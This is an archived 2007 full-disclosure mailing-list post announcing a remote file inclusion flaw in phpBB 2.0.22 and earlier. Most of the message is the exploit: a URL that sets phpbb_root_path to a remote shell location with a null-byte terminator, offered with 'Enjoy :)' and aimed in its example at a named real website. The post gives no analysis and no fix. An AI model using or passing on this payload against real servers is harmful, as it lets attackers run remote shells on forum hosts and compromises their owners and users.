[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <E1HuAYf-0007t3-2B@rancor.nocdirect.com>
Date: Fri, 01 Jun 2007 13:05:01 -0400
From: dr.rezen@...il.com
To: full-disclosure@...ts.grok.org.uk
Subject: 0DAY RFI in phpBB <= 2.0.22 HOT
New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:
victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
For example:
http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
Enjoy :)
BUG BY REZEN! XORCREW! H4X H4X!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists